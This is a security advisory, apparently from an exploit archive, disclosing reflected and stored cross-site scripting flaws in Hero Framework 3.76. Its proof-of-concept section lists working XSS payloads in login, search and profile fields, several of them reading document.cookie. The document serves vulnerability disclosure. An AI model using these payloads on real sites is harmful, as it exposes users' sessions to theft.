id: 20154
date: 01/11/2013
title: Hero Framework 3.76 Cross Site Scripting Vulnerability
author: Stefan Schurtz
cves: 

Advisory:        Hero Framework 3.76 Multiple Cross-site Scripting
vulnerabilities
Author:            Stefan Schurtz
Affected Software:     Successfully tested on Hero Framework 3.76
Vendor URL:         http://www.heroframework.com/
Vendor Status:         informed
 
===========================
Vulnerability Description
===========================
 
Hero Framework 3.76 is prone to multiple Cross-Site Scripting
vulnerabilities
 
======================
PoC-Exploit
======================
 
http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script>
http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"
http://[target]/hero_os/users/login?errors=true&username="
onmouseover%3dalert(/XSS/) %3d"
 
// POST-Parameter
 
Username: '"><script>alert(document.cookie)</script>
First Name: '"><script>alert(document.cookie)</script>
Last Name: '"><script>alert(document.cookie)</script>
 
======================
Solution
======================
 
- -
 
======================
Disclosure Timeline
======================
 
16-Dec-2012 - informed via contact form
16-Dec-2012 - feedback from vendor
 
======================
Credits
======================
 
Vulnerabilities found and advisory written by Stefan Schurtz.

#  0day.today [2023-03-22]  #